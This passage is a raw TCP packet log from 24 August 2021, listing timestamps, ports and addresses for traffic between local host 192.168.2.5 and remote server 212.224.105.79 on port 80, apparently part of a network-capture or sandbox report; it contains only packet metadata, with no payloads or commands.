Aug 24, 2021 08:49:17.348612070 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348620892 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.348628998 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348644018 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.348647118 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348665953 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348675013 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.348684072 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348700047 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348709106 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.348718882 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348730087 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.348736048 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348752975 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348763943 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.348769903 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348786116 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348805904 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348814011 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.348824024 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348833084 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.348840952 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348855019 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348855019 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.348871946 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348886967 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.348892927 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348911047 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348917961 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.348927021 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348943949 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348953009 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.348959923 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348978043 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.348992109 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.348994017 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349009991 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349016905 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.349030972 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349033117 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.349050045 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349061966 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.349066019 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349081993 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.349082947 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349101067 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349112034 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349123955 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.349132061 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349138021 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.349148035 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349164963 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349172115 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.349181890 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349198103 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349210024 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.349214077 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349232912 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349239111 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.349252939 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349260092 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.349272013 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349280119 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.349287987 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349301100 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.349304914 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349323988 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349335909 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.349340916 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349358082 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349374056 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.349375010 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349390984 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.349395037 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349409103 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.349412918 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349431038 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349438906 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.349447966 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349467039 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349468946 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.349483013 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349498987 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349507093 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.349515915 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349524021 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.349538088 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349555969 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349562883 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.349572897 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349590063 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349601030 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.349606037 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349622011 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.349622965 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349639893 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349653006 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.349656105 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349674940 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349687099 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.349693060 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349709034 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.349709988 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349725962 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349736929 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.349742889 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349759102 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349771976 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.349776030 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349792957 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349812031 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.349827051 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349828005 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.349844933 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349857092 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.349860907 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349875927 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349879026 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.349891901 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349906921 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349912882 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.349921942 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349932909 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.349937916 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349956989 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349966049 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.349973917 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349986076 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.349993944 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.349997997 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.350011110 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.350028038 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.350035906 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.350044966 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.350064993 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.350073099 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.350087881 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.350095987 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.350135088 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.353671074 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.354976892 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.371541977 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.371582985 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.371596098 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.371805906 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.371876955 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.372648954 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.372711897 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.372726917 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.372745037 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.372761011 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.372776031 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.372785091 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.372792006 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.372812033 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.372831106 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.372831106 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.372847080 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.372859955 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.372863054 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.372879028 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.372891903 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.372898102 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.372914076 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.372926950 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.372930050 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.372950077 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.372951031 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.372967958 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.372983932 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.372994900 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.372999907 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373017073 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373018980 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.373032093 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373049021 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373049021 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.373064041 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373084068 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373100996 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373102903 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.373116970 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373128891 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.373133898 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373150110 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373162031 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.373164892 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373182058 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373198032 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373202085 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.373217106 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373222113 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.373235941 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373250961 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373260975 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.373267889 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373284101 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373291016 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.373300076 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373317957 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373337030 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373342991 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.373356104 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373373032 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.373373985 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373389959 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373405933 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373411894 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.373421907 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373433113 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.373436928 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373452902 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373456955 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.373470068 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373490095 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373501062 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.373507023 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373523951 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373531103 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.373539925 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373557091 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373574018 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373574018 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.373589039 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373601913 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.373605013 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373624086 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373639107 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.373641014 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373656034 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373666048 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.373672009 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373688936 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373703957 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373717070 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.373719931 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373737097 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373750925 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.373755932 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373774052 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373778105 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.373790026 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373799086 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.373806953 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373822927 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373836040 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.373837948 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373853922 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373871088 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373871088 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.373888969 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373893023 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.373907089 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373923063 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373939991 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373945951 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.373955965 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373971939 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373977900 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.373987913 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.373996973 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.374003887 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374022961 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374031067 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.374041080 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374057055 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374068022 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.374073982 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374090910 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374094963 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.374106884 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374125004 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374140978 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374151945 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.374164104 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374181032 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.374182940 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374200106 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374214888 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374228001 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.374233007 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374250889 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374264956 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.374267101 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374284983 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374300003 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.374305010 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374322891 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374340057 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374356985 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374361992 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.374373913 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374392033 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374404907 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.374411106 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374427080 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.374427080 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374447107 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374454021 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.374464989 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374481916 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374490023 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.374497890 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374514103 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374530077 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374530077 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.374547005 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374553919 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.374562025 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374582052 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374598980 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374603987 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.374614954 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374631882 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374633074 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.374650002 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374655962 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.374665022 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374680996 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374694109 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.374696970 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374716997 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374726057 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.374733925 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374749899 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374766111 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374775887 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.374783039 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374798059 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374810934 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.374814034 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374829054 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374836922 CEST	49712	80	192.168.2.5	212.224.105.79
